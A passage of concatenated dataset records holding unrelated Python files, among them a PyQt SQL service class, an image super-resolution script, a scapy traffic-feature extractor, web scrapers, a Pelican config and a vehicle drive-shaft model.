#Filter 1\n #np.where returns elements, either x or y, depending on condition\n #find index of elements where (from a to b)\n xindex4 = np.where(np.logical_and(x_p >= x[0], x_p <= x[1]))\n \n #make an earth x array that corresponds to x index (wavelength)\n p_xarray1 = x_p[xindex4]\n \n #find y values corresponding to x range (flux)\n p_yarray1 = flux_p[xindex4]\n \n #integrate values in yarray to give total flux 
for wavelength range\n    flux_p1 = np.trapz(p_yarray1,x=p_xarray1)\n    \n    #Filter 2\n    xindex5 = np.where(np.logical_and(x_p >= x[2], x_p <= x[3]))\n    \n    p_xarray2 = x_p[xindex5]\n    \n    p_yarray2 = flux_p[xindex5]\n    \n    flux_p2 = np.trapz(p_yarray2,x=p_xarray2)\n    \n    #Filter 3\n    xindex6 = np.where(np.logical_and(x_p >= x[4], x_p <= x[5]))\n    \n    p_xarray3 = x_p[xindex6]\n    \n    p_yarray3 = flux_p[xindex6]\n    \n    flux_p3 = np.trapz(p_yarray3,x=p_xarray3)\n\n    max = np.sqrt(((flux_earth1/flux_earth2) - (flux_p1/flux_p2))**2 +\n          ((flux_earth3/flux_earth2) - (flux_p3/flux_p2))**2)\n    #print earth_xarray2\n    \"\"\"print ('haha')\n    print flux_earth1\n    print flux_earth2\n    print flux_earth3\n    print flux_jup1\n    print flux_jup2\n    print flux_jup3\n    print ('hahaha')\"\"\"\n    #print max\n    return max\n","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"313810639","text":"import sys, os\n\nfrom PyQt5.QtCore import QObject, pyqtSignal as Signal, pyqtSlot as Slot\n\nfrom classes import database\n\nclass service(QObject):\n    def __init__(self):\n        QObject.__init__(self)\n        self.fromDB = database.database()\n        self.sqlString = None\n        self.sqlData = None\n        self.sqlList = None\n        self.idText = None\n    \n    @Slot()\n    def getCurrentAccount(self):\n        txtLocationAndName = os.path.join(\n            os.getcwd(), \n            r\"texts/fileDirectoryText.txt\"\n        )\n\n        txtFile = open(\n            txtLocationAndName, \n            \"r\"\n        )\n\n        for x in txtFile:\n            self.idText = x.split(',')[0]\n        txtFile.close()\n    \n    displaySignal = Signal(str, str)\n    displaySignal2 = Signal(int, int)\n    @Slot()\n    def display(self):\n        self.sqlString = \"SELECT id, servicetitle, servicemessage FROM serviceoffered WHERE instructor = \" + self.idText + \" AND accepted = '0' ORDER BY id DESC\"\n        self.sqlList = self.fromDB.selectall(self.sqlString)\n        count = 0\n        for x in self.sqlList:\n            self.displaySignal.emit(x[1], x[2])\n            self.displaySignal2.emit(count, x[0])\n            count += 1\n\n    @Slot(str, str)\n    def addService(self, title, message):\n        title = title.title()\n        self.sqlString = \"INSERT INTO serviceoffered (instructor, servicetitle, servicemessage) VALUES (%s, %s, %s)\"\n        self.sqlData = (self.idText, title, message)\n        self.fromDB.setValues(self.sqlString, self.sqlData)\n    \n    @Slot(int, str, str)\n    def editService(self, id, title, message):\n        title = title.title()\n        self.sqlString = \"UPDATE serviceoffered SET servicetitle = %s, servicemessage = %s WHERE id = %s\"\n        self.sqlData = (title, message, id)\n        self.fromDB.setValues(self.sqlString, self.sqlData)\n\n    @Slot(int)\n    def removeService(self, id):\n        self.sqlString = \"DELETE FROM serviceoffered WHERE id = %s\"\n        self.sqlData = (id,)\n        self.fromDB.setValues(self.sqlString, self.sqlData)","sub_path":"classes/adminFunctions/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"646975796","text":"import os\nimport time\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom flask import current_app\n\n\ndef enhance_image(low_res_img):\n    try:\n        hr_image = preprocess_image(low_res_img)\n        model = hub.load(\"https://tfhub.dev/captain-pool/esrgan-tf2/1\")\n        start = time.time()\n        fake_image = model(hr_image)\n        fake_image = tf.squeeze(fake_image)\n        print(\"Time Taken: %f\" % (time.time() - start))\n        save_image(fake_image, 
current_app.config[\"SUPER_RES_COMPUTED_IMG\"])\n return True\n except Exception as e:\n raise e\n\n\ndef preprocess_image(image_path):\n hr_image = tf.image.decode_image(tf.io.read_file(image_path))\n if hr_image.shape[-1] == 4:\n hr_image = hr_image[...,:-1]\n hr_size = (tf.convert_to_tensor(hr_image.shape[:-1]) // 4) * 4\n hr_image = tf.image.crop_to_bounding_box(hr_image, 0, 0, hr_size[0], hr_size[1])\n hr_image = tf.cast(hr_image, tf.float32)\n return tf.expand_dims(hr_image, 0)\n\n\ndef save_image(image, filename):\n if not isinstance(image, Image.Image):\n image = tf.clip_by_value(image, 0, 255)\n image = Image.fromarray(tf.cast(image, tf.uint8).numpy())\n image.save(\"%s\" % filename)\n print(\"Saved as %s\" % filename)\n","sub_path":"server_2/super_res.py","file_name":"super_res.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278818121","text":"import pandas as pd\nfrom scapy.all import *\nfrom data import *\n\ndef collect_data():\n\t#pkt_list = rdpcap(\"pcaps/merged_pcap_no_ss_and_ss.pcap\")\n\tpkt_list = rdpcap(\"pcaps/ss_and_no_ss_BIG.pcapng\")\n\tprint(\"Done loading\")\n\ts = pkt_list.sessions()\n\td = {}\n\tip_list = []\n\tcount = 0\n\tcount_all = 0\n\tfor k,v in s.iteritems():\n\t\tcount_all += 1\n\t\tproto = re.search(\"^([^\\s]+)\",k).group()\n\t\tsplit = re.split(\">\",k)\n\t\tip_src = re.search(\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\",split[0]).group()\n\t\tip_dst = re.search(\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\",split[1]).group()\n\t\t#if proto == \"TCP\" or proto == \"UDP\":\n\t\tif proto == \"TCP\":\n\t\t\tsrc_prt = re.search(\":(\\d+)\\s\",split[0]).group()[1:-1]\n\t\t\tdst_prt = re.search(\":(\\d+)\",split[1]).group()[1:]\n\t\telse:\n\t\t\tcontinue\n\t\tdirection_flag = True\n\t\tif(\"10.\" in ip_src or \"172.16\" in ip_src or \"172.31\" in ip_src or \"192.168\" in ip_src):\n\t\t\tdirection_flag = True #outflow\n\t\telif(\"10.\" in ip_dst or \"172.16\" in ip_dst or \"172.31\" in ip_dst or \"192.168\" in ip_dst):\n\t\t\tdirection_flag = False #inflow\n\t\telse:\n\t\t\tcontinue\n\t\tif(ip_src < ip_dst): #ip_src first\n\t\t\tif(int(src_prt) < int(dst_prt)):\n\t\t\t\tsrc_dst_pair = ip_src + \":\" + src_prt + \"_\" + ip_dst + \":\" + dst_prt\n\t\t\telse:\n\t\t\t\tsrc_dst_pair = ip_src + \":\" + dst_prt + \"_\" + ip_dst + \":\" + src_prt\n\t\telse: #ip_dst first\n\t\t\tif(int(dst_prt) < int(src_prt)):\n\t\t\t\tsrc_dst_pair = ip_dst + \":\" + dst_prt + \"_\" + ip_src + \":\" + src_prt\n\t\t\telse:\n\t\t\t\tsrc_dst_pair = ip_dst + \":\" + src_prt + \"_\" + ip_src + \":\" + dst_prt\n\t\tk = proto + \"_\" + src_dst_pair\n\t\tif k not in d:\n\t\t\td[k] = []\n\t\t\td[k].append([])\n\t\t\td[k].append([])\n\t\tholder = []\n\t\td[k][direction_flag].append(direction_flag)\n\t\td[k][direction_flag].append(get_flow_duration(v))\n\t\td[k][direction_flag].append(get_min_ia_time(v))\n\t\td[k][direction_flag].append(get_mean_ia_time(v))\n\t\td[k][direction_flag].append(get_max_ia_time(v))\n\t\td[k][direction_flag].append(get_stddev_ia_time(v))\n\t\tholder = 
get_min_mean_max_pkt_len(v)\n\t\td[k][direction_flag].append(holder[0])\n\t\td[k][direction_flag].append(holder[1])\n\t\td[k][direction_flag].append(holder[2])\n\t\td[k][direction_flag].append(get_stddev_pkt_len(v))\n\t\td[k][direction_flag].append(get_num_pkts(v)) #this fcn and the one above could be combined\n\t\tholder = get_min_mean_max_payload_entropy(v)\n\t\td[k][direction_flag].append(holder[0])\n\t\td[k][direction_flag].append(holder[1])\n\t\td[k][direction_flag].append(holder[2])\n\t\td[k][direction_flag].append(v)\n\n\tprint(\"Done with packet features\")\n\t####### Both Direction Calculations ########\n\tdel_vals = []\n\tdf_dict = {}\n\tfor k, v in d.iteritems():\n\t\tif not d[k][0] or not d[k][1]:\n\t\t\tdel_vals.append(k)\n\tfor i in range(len(del_vals)):\n\t\tdel d[del_vals[i]]\n\tfor k,v in d.iteritems():\n\t\td[k].append(get_out_in_ratio(v))\n\t\tmin_max_burst = get_min_mean_max_burst_len(v)\n\t\td[k].append(min_max_burst[0])\n\t\td[k].append(min_max_burst[1])\n\t\td[k].append(min_max_burst[2])\n\t\td[k].append(is_ss(k))\n\n\t\tdf_dict[k] = []\n\t\tfor i in range(len(d[k][0])-2):\n\t\t\tdf_dict[k].append(d[k][0][i+1])\n\t\tfor i in range(len(d[k][1])-2):\n\t\t\tdf_dict[k].append(d[k][1][i+1])\n\t\tfor i in range(len(d[k])-2):\n\t\t\tdf_dict[k].append(d[k][i+2])\n\tprint(\"Done with flow features\")\n\treturn df_dict\n\ndef set_df_for_ML(df_dict, drop_list):\n\tcolumns = ['i_flow_dur','i_min_ia','i_mean_ia','i_max_ia','i_sdev_ia',\n\t'i_min_len','i_mean_len','i_max_len','i_sdev_len','i_#pkts',\n\t'i_min_e', 'i_mean_e', 'i_max_e',\n\t'o_flow_dur','o_min_ia','o_mean_ia','o_max_ia','o_sdev_ia',\n\t'o_min_len','o_mean_len','o_max_len','o_sdev_len','o_#pkts',\n\t'o_min_e', 'o_mean_e', 'o_max_e',\n\t'biflow_rat', 'min_burst', 'mean_burst', 'max_burst',\n\t'is_ss']\n\tdf_data = pd.DataFrame()\n\tdf_data = df_data.from_dict(df_dict, orient='index')\n\tdf_data.columns = columns\n\n\tdf_data = drop_cols(df_data, drop_list)\n\n\tlen_col = len(df_data.columns)\n\tcounts = df_data['is_ss'].value_counts()\n\tdiff0 = counts[0] - counts[1]\n\tdiff = abs(diff0)\n\tif(diff0 > 0): # more SS data than no_SS data\n\t\tvals = df_data[df_data['is_ss'] == 0]\n\t\tindex_to_remove = np.random.choice(len(vals), diff, replace=False) #vector of random ints from 0 to max index of computer articles\n\t\t#print(\"num entries to randomly remove\", len(index_to_remove))\n\t\tvals = vals.drop(vals.index[index_to_remove]) #drop random ints\n\t\t#print(\"num no_SS data after removal\", len(vals))\n\t\tbig_temp = df_data.drop(df_data[(df_data.is_ss==0)].index)\n\t\tdf_data = big_temp.append(vals)\n\telif(diff0 < 0):\n\t\tvals = df_data[df_data['is_ss'] == 1]\n\t\tindex_to_remove = np.random.choice(len(vals), diff, replace=False) #vector of random ints from 0 to max index of computer articles\n\t\tvals = vals.drop(vals.index[index_to_remove]) #drop random ints\n\t\tbig_temp = df_data.drop(df_data[(df_data.is_ss==1)].index)\n\t\tdf_data = big_temp.append(vals)\n\n\treturn [df_data, columns, len_col]\n\n\ndef drop_cols(df_data, drop_list):\n\tfor key in drop_list:\n\t\tdel df_data[key]\n\treturn df_data\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210616560","text":"class Solution:\n # @return an integer\n def atoi(self, string):\n INT_MAX = 2147483647; INT_MIN = -2147483648; bound = INT_MAX/10\n string = 
string.strip()\n        sign = 1\n        if string.startswith('+'):\n            string = string[1:]\n        elif string.startswith('-'):\n            sign = -1\n            string = string[1:]\n\n        res = 0\n        i = 0\n        while i<len(string) and string[i].isdigit():\n            num = int(string[i])\n            if(res>bound or (res==bound and num > 7)):\n                return INT_MAX if sign == 1 else INT_MIN\n            res = res * 10 + num #this is the key computation for processing int from left to right, digit by digit\n            i += 1\n        return res*sign\n\nprint(Solution().atoi(\"2147483648\"))","sub_path":"algorithm/string-to-integer.py","file_name":"string-to-integer.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"217385685","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nimport time\nfrom urllib.parse import urlparse\n\ndef get_domain(url):\n    ''' Return just the domain (and subdomain!) for a url\n    '''\n    parsed_uri = urlparse(url)\n    domain = '{uri.netloc}'.format(uri=parsed_uri)\n    domain = domain.replace('www.', '')\n\n    return domain\n\n\nJINJA_FILTERS = {\n    'get_domain':get_domain,\n}\n\nLAST_UPDATE = str(time.strftime('%m %Y'))\nYEAR = str(time.strftime('%Y'))\n\nSITEURL = ''\nAUTHOR = u'Joe Hand'\nAUTHOR_LINKS = {\n    'INSTAGRAM' : 'http://instagram.com/joeahand',\n    'GITHUB' : 'https://github.com/joehand',\n    'TWITTER' : 'http://twitter.com/joeahand/',\n    # use html entities to obfuscate for spammers (http://stackoverflow.com/questions/748780/best-way-to-obfuscate-an-e-mail-address-on-a-website)\n    'EMAIL' : 'joe@joeahand.com'\n}\nSITENAME = u'Joe Hand'\nSITESUBTITLE = u'Better cities with local data'\n\nNAV_PAGES = ['about', 'cv']\n\nTHEME = 'themes/joe/'\n\nPATH = 'content'\n\nTIMEZONE = 'US/Mountain'\n\nDEFAULT_LANG = u'en'\nDEFAULT_DATE_FORMAT = '%Y-%B-%d'\n\nDIRECT_TEMPLATES = ('index', 'tags', 'categories', 'archives','sitemap')\n\nSITEMAP_SAVE_AS = 'sitemap.xml'\n\nSTATIC_PATHS = []\nPLUGIN_PATHS = [\"plugins\", 'plugins/pelican-plugins']\nPLUGINS = [\n    'assets',\n    'pelican_gdocs'\n    ]\n# PLUGIN Settings\nGITHUB_USER = 'joehand'\nGDOCS = [\n    {\n        'name':'instagram',\n        'url':'http://docs.google.com/spreadsheets/d/16KHyJyTGvOIFKTR5uUHrXKWH3kf-UiucCwXfceFet0k/pub?gid=0&single=true&output=csv'\n    },\n    {\n        'name':'articles',\n        'url':'http://docs.google.com/spreadsheets/d/1Wav1nDxtOTRm3WMLL3RI0oqApxLjBxzTcPftWsCn6x4/pub?gid=0&single=true&output=csv'\n    },\n    {\n        'name':'fitbit_activity',\n        'url':'http://docs.google.com/spreadsheets/d/1AZRyvrcm-Stk0VlWoPEHD4sxe1PTOdEpU2MejRzHB7s/pub?gid=0&single=true&output=csv'\n    },\n    {\n        'name':'tweets',\n        'url':'http://docs.google.com/spreadsheets/d/1qRuICBJWHQQ34ujTXkY8jh7obJuVJ_quLbwMrBiQFyg/pub?gid=0&single=true&output=csv'\n    },\n    {\n        'name':'steps',\n        'url':'https://docs.google.com/spreadsheets/d/1AZRyvrcm-Stk0VlWoPEHD4sxe1PTOdEpU2MejRzHB7s/pub?gid=0&single=true&output=csv'\n    },\n    {\n        'name':'coffee',\n        'url':'https://docs.google.com/spreadsheets/d/1fsaSy8HJdoTr5iUX7p-iCxUwC-TFzZxnqNzt6mMP26s/pub?gid=0&single=true&output=csv'\n    },\n]\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nARTICLE_URL = 'archive/{slug}/'\nARTICLE_SAVE_AS = 'archive/{slug}/index.html'\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/index.html'\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\nTAG_URL = ''\nTAG_SAVE_AS = ''\nAUTHOR_URL = ''\nAUTHOR_SAVE_AS = ''\nARCHIVES_URL = 'archive/'\nARCHIVES_SAVE_AS = 'archive/index.html'\n#YEAR_ARCHIVE_SAVE_AS = 
'posts/{date:%Y}/index.html'\n\nDEFAULT_PAGINATION = 5\nPAGINATION_PATTERNS = (\n (1, '{base_name}/', '{base_name}/index.html'),\n (2, '{base_name}/{number}/', '{base_name}/{number}/index.html'),\n)\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\n#SPECIAL THEME SETTINGS\nHOME_PAGE = {\n 'content' : 'home',\n 'count' : 0,\n 'partial' : True,\n 'links' : [\n ('Projects',SITEURL + '#test'),\n ('Longer Bio',SITEURL + '/about/'),\n ('Writing','http://medium.com/@joehand'),\n ]\n}\n\nCOPYRIGHT_LINK = 'http://creativecommons.org/licenses/by-nc-nd/4.0/'\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"70944817","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\n\ndef get_html(url):\n response = requests.get(url)\n if response.ok:\n return response.text\n raise ConnectionError('Что-то пошло не так!')\n\n\ndef get_next_page(html, url):\n soup = BeautifulSoup(html, 'lxml')\n next_page = url + soup.find(\n 'div', class_='list-pager-div'\n ).find('a', id='pager_next').get('href')\n return next_page\n\n\ndef normalize_num(string):\n rez = ''\n for el in string:\n if el.isdigit():\n rez += el\n return rez\n\n\ndef write_csv(data):\n with open('data.csv', 'a', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(data)\n\n\ndef get_info(start_url, addition_url):\n html = get_html(start_url)\n while True:\n soup = BeautifulSoup(html, 'lxml')\n all_devise = soup.find(\n 'form', id='list_form1'\n ).find_all(\n 'div', class_=r\"model-short-div\"\n )\n for device in all_devise:\n\n try:\n name = device.find('a').find('span', class_='u').text\n price = device.find(\n 'div', class_='model-price-range'\n ).find_all('span')\n except:\n continue\n start_price = normalize_num(price[0].text)\n end_price = normalize_num(price[1].text)\n if end_price == '':\n end_price = start_price\n url = addition_url + device.find('a').get('href')\n write_csv((name, start_price, end_price, url))\n # print(name, start_price, end_price, url)\n try:\n next_page_url = get_next_page(html, addition_url)\n print(next_page_url)\n html = get_html(next_page_url)\n except:\n break\n\n\ndef main():\n url = 'https://www.e-katalog.ru/list/170/'\n get_info(url, 'https://www.e-katalog.ru')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"course/ekatalog_parser.py","file_name":"ekatalog_parser.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"226148472","text":"\"\"\"Draw five stars, but between each, pick up the pen, move forward by 350 units,\nturn right by 144, put the pen down, and draw the next star.\"\"\"\nimport turtle\n\n\ndef drawStar(t):\n angle = 144\n size = 100\n\n for i in range(5):\n t.forward(size)\n t.right(angle)\n\n\ndef main():\n wn = turtle.Screen() # Set up the window\n wn.bgcolor(\"lightgreen\")\n\n tess = turtle.Turtle() # create tess\n\n for i in range(5):\n drawStar(tess)\n tess.penup()\n tess.forward(350)\n tess.right(144)\n tess.pendown()\n\n wn.exitonclick()\n\n\nmain()\n","sub_path":"Chp_6/6.15.py","file_name":"6.15.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193179735","text":"import numpy as np\nfrom utilities import *\nimport matplotlib.pyplot as 
plt\nfrom scipy.ndimage import gaussian_filter\n\ndef main():\n fig = plt.figure()\n img = load_image()\n fig.add_subplot(2, 2, 1)\n plt.imshow(img)\n # gaussian kernel\n kernel = gkern(11, 3)\n # kernel = np.array([[1, 4, 7, 4, 1], [4, 16, 26, 16, 4], [7, 26, 41, 26, 7], [4, 16, 26, 16, 4], [1, 4, 7, 4, 1]], np.float32)\n # kernel = kernel / 273\n # kernel = np.ones((11, 11))/121\n\n # noise\n # noise = np.zeros(img.shape)\n # noise = np.clip(noise, -0.3, 0.3)\n img = np.clip(img, 0, 1)\n\n conv_img = np.array([])\n # fig.add_subplot(2, 2, 2)\n # plt.imshow(img)\n\n for ch in range(3):\n # channel\n img_ch = img[:, :, ch]\n # Fast Fourier Transform\n img_fft = np.fft.fft2(img_ch)\n kernel_fft = np.fft.fft2(kernel, img_ch.shape)\n # elementwise multiply\n conv_fft = img_fft * kernel_fft\n # inverse fft\n conv_img_ch = np.fft.ifft2(conv_fft)\n h, w = conv_img_ch.shape\n conv_img_ch = np.reshape(conv_img_ch, (h, w, 1))\n # pick real number, merge channel\n conv_img_ch = conv_img_ch.real\n if len(conv_img) != 0:\n conv_img = np.append(conv_img, conv_img_ch, axis=2)\n else:\n conv_img = conv_img_ch\n\n noise = np.random.normal(0, 0.01, img.shape)\n # noise = np.zeros(img.shape)\n\n tmp_img = np.clip(conv_img, 0, 1)\n tmp_img = tmp_img * 255\n tmp_img = tmp_img.astype(np.uint8)\n fig.add_subplot(2, 2, 2)\n plt.imshow(tmp_img)\n\n conv_img = conv_img + noise\n\n tmp_img = np.clip(conv_img, 0, 1)\n tmp_img = tmp_img * 255\n tmp_img = tmp_img.astype(np.uint8)\n fig.add_subplot(2, 2, 3)\n plt.imshow(tmp_img)\n\n res_img = np.array([])\n for ch in range(3):\n conv_ch = conv_img[:, :, ch]\n # Fast Fourier Transform\n kernel_fft = np.fft.fft2(kernel, conv_ch.shape)\n conj_kernel_fft = np.conjugate(kernel_fft)\n conv_fft = np.fft.fft2(conv_ch)\n noise_fft = np.fft.fft2(noise[:,:,ch])\n # noise_fft = 0\n wiener_filter = (conj_kernel_fft * conv_fft) / ((kernel_fft.real ** 2 + kernel_fft.imag ** 2) * conv_fft + noise_fft)\n\n res_img_ch = np.fft.ifft2(wiener_filter * conv_fft)\n h, w = res_img_ch.shape\n res_img_ch = np.reshape(res_img_ch, (h, w, 1))\n res_img_ch = res_img_ch.real\n if len(res_img) != 0:\n res_img = np.append(res_img, res_img_ch, axis=2)\n else:\n res_img = res_img_ch\n\n res_img = np.clip(res_img, 0, 1)\n res_img = res_img * 255\n res_img = res_img.astype(np.uint8)\n tmp = Image.fromarray(res_img)\n\n fig.add_subplot(2, 2, 4)\n plt.imshow(res_img)\n plt.show()\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53417106","text":"import time\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom selenium import webdriver\nimport csv\nimport re\n\nchrome_path = r\"D:/chromedriver.exe\"\ndriver = webdriver.Chrome(chrome_path) # Optional argument, if not specified will search path.\n\ncounter = 0\nRIGHTnow = time.localtime(time.time());\nRIGHTtodaysDate = strftime(\"%d-%m-%Y\", RIGHTnow);\n\nfor z in range(15,30):\n for k in range(1, 6): # walk through dates ( 1 to 5 )\n now = time.localtime(time.time() + (24 * 3600 * z));\n tomorrow = time.localtime(time.time() + (24 * 3600 * k) + (24 * 3600 * z))\n\n todaysDate = strftime(\"%m/%d/%Y\", now)\n todaysDate2 = strftime(\"%d-%m-%Y\", now)\n\n tomorrowsDate = strftime(\"%m/%d/%Y\", tomorrow)\n tomorrowsDate2 = strftime(\"%d-%m-%Y\", tomorrow)\n\n checkin_monthday = strftime(\"%d\", now)\n checkin_month = strftime(\"%m\", now)\n checkin_year = strftime(\"%Y\", now)\n\n 
checkout_monthday = strftime(\"%d\", tomorrow)\n checkout_month = strftime(\"%m\", tomorrow)\n checkout_year = strftime(\"%Y\", tomorrow)\n\n endDate = tomorrowsDate\n\n # driver.get('https://www.expedia.com/Hotel-Search?destination=New+York%2C+New+York&latLong=40.75668%2C-73.98647®ionId=178293&startDate=\" + _startDate + \"&endDate=\" + _endDate + \"&rooms=1&adults=1');\n driver.get(\n 'https://www.expedia.com/Hotel-Search?destination=New+York%2C+NY+%28LGA-LaGuardia%29&latLong=40.77429%2C-73.872035®ionId=4278092&startDate='+todaysDate+'&endDate='+endDate+'&rooms=1&adults=1');\n\n\n time.sleep(7)\n\n blocks = driver.find_elements_by_class_name(\"listing\")\n num_of_blocks = len(blocks)\n\n try:\n with open('expedia2.csv', 'r') as file1:\n existingLines = [line for line in csv.reader(file1, delimiter=',')]\n except:\n existingLines = []\n\n with open('expedia2.csv', mode='a', newline='') as employee_file:\n employee_writer = csv.writer(employee_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for i in range(num_of_blocks):\n try:\n hotelName = blocks[i].find_element_by_tag_name(\"h3\");\n hotelPrice = blocks[i].find_element_by_xpath(\"//span[@data-stid='content-hotel-lead-price']\"); # Updated\n hotelRank = blocks[i].find_element_by_class_name(\"listing__reviews\");\n hotelRank = hotelRank.find_elements_by_tag_name('span')\n hotelRating = hotelRank[0].text;\n\n if (\"reviews\" in hotelRank[1].text):\n hotelReviews = hotelRank[1].text;\n else:\n hotelReviews = hotelRank[2].text;\n\n hotelReviews = re.sub(' reviews\\)', '', hotelReviews);\n hotelReviews = re.sub('\\(', '', hotelReviews);\n\n hotelName = hotelName.text;\n\n if (\"reviews\" in hotelReviews):\n continue;\n\n # Checks if the data already exists !!\n if [\n RIGHTtodaysDate,\n todaysDate2,\n tomorrowsDate2,\n hotelName,\n hotelPrice.text,\n hotelRating,\n hotelReviews\n ] not in existingLines:\n employee_writer.writerow([\n RIGHTtodaysDate,\n todaysDate2,\n tomorrowsDate2,\n hotelName,\n hotelPrice.text,\n hotelRating,\n hotelReviews\n ])\n counter = counter + 1\n\n print(hotelName)\n print(hotelPrice.text)\n print(hotelRating)\n print(hotelReviews)\n\n except:\n print(\"not found\")\n\ndriver.quit()\nprint(\"rows added: \" + counter.__str__())\nprint(\"done\")","sub_path":"venv/expedia2.py","file_name":"expedia2.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"569738077","text":"# standard library imports\nimport os\n\n# uraeus imports\nfrom uraeus.smbd.systems import template_topology, configuration\n\n# getting directory of current file and specifying the directory\n# where data will be saved\ndir_name = os.path.abspath(os.path.dirname(__file__))\ndata_dir = os.path.join(dir_name, 'data')\ndatabase_directory = os.path.abspath(os.path.join(dir_name, '../../../'))\n\n# ============================================================= #\n# Symbolic Topology\n# ============================================================= #\n\n# Creating the symbolic topology as an instance of the\n# standalone_topology class\nproject_name = 'drive_shafts_v2'\nsym_model = template_topology(project_name)\n\n# Adding Bodies\n# =============\n\n# Drive Shafts\nsym_model.add_body('inner_shaft', mirror=True)\nsym_model.add_body('coupling_inner', mirror=True)\nsym_model.add_body('coupling_outer', mirror=True)\n\n# Helper Bodies\nsym_model.add_body('differential', virtual=True)\nsym_model.add_body('wheel_hub', virtual=True, mirror=True)\n\n# 
Adding Joints\n# =============\nsym_model.add_joint.revolute('diff_joint', 'rbr_inner_shaft', 'vbs_differential', mirror=True)\nsym_model.add_joint.universal('inner_cv', 'rbr_inner_shaft', 'rbr_coupling_inner', mirror=True)\nsym_model.add_joint.translational('coupling_trans', 'rbr_coupling_inner', 'rbr_coupling_outer', mirror=True)\nsym_model.add_joint.universal('outer_cv', 'rbr_coupling_outer', 'vbr_wheel_hub', mirror=True)\n\n# Adding Forces\n# =============\nsym_model.add_force.local_torque('drive', 'rbr_inner_shaft', mirror=True)\n\n\n# Assembling and Saving the model\nsym_model.save(data_dir)\nsym_model.assemble()\n\n# ============================================================= #\n# Symbolic Configuration\n# ============================================================= #\n\n# Symbolic configuration name.\nconfig_name = '%s_cfg'%project_name\n\n# Symbolic configuration instance.\nsym_config = configuration(config_name, sym_model)\n\n# Adding the desired set of UserInputs\n# ====================================\nsym_config.add_point.UserInput('inner_cv', mirror=True)\nsym_config.add_point.UserInput('outer_cv', mirror=True)\nsym_config.add_point.UserInput('diff_input', mirror=True)\n\nsym_config.add_vector.UserInput('x')\nsym_config.add_vector.UserInput('y')\nsym_config.add_vector.UserInput('z')\n\n# Defining Relations between original topology inputs\n# and our desired UserInputs.\n# ===================================================\nsym_config.add_point.Centered('coupling_mid', ('hpr_inner_cv', 'hpr_outer_cv'), mirror=True)\n\n# Inner CV Joint:\n# ===============\nsym_config.add_relation.Equal_to('pt1_jcr_inner_cv', ('hpr_inner_cv',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_inner_cv', ('hpr_inner_cv', 'hpr_diff_input'), mirror=True)\nsym_config.add_relation.Oriented('ax2_jcr_inner_cv', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\n\n# Outer CV Joint:\n# ===============\nsym_config.add_relation.Equal_to('pt1_jcr_outer_cv', ('hpr_outer_cv',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_outer_cv', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\nsym_config.add_relation.Equal_to('ax2_jcr_outer_cv', ('vcs_y',), mirror=True)\n\n# Coupling Trans Joint:\n# ====================\nsym_config.add_relation.Equal_to('pt1_jcr_coupling_trans', ('hpr_coupling_mid',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_coupling_trans', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\n\n# Differential Joint:\n# ===================\nsym_config.add_relation.Equal_to('pt1_jcr_diff_joint', ('hpr_diff_input',), mirror=True)\nsym_config.add_relation.Equal_to('ax1_jcr_diff_joint', 